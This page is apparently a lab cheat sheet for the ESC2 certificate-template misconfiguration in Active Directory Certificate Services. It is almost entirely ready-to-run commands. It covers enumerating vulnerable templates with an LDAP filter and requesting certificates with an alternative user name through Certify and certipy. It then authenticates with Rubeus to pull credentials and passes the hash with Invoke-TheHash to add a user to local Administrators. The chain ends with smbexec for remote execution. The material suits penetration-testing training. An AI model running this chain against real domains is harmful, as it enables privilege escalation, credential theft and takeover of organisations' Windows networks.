Skip to main content

ESC2

ESC2

Windows

Enumerate ESC2 vulnerability

PS /home/bobbuilder> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=local,DC=lab'

Requesting a certificate

PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVER /template:ESC2Template2 /altname:user1@local.lab

Convert Certificate

Certificate Authentication

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1 /certificate:cert.pfx /getcredentials /nowrap

PassTheHash using Invoke-TheHash

PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> cd .\Invoke-TheHash\;Import-Module .\Invoke-TheHash.psm1
PS /home/bobbuilder> Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash _hash_here_your_hash -Command "net localgroup Administrators user2 /add"

Linux

Certificate Request with alternative SAN

bobbuilder:/home# certipy req -u 'user1@local.lab' -p 'password1' -ca CA-Server.local.lab -template ESC2Template2 -upn user1

Certificate Authentication

bobbuilder:/home# certipy auth -pfx administrator.pfx -username administrator -domain local.lab -dc-ip 10.10.10.10

Verify

bobbuilder:/home# KRB5CCNAME=administrator.ccache smbexec.py -k -no-pass CA-Server.local.lab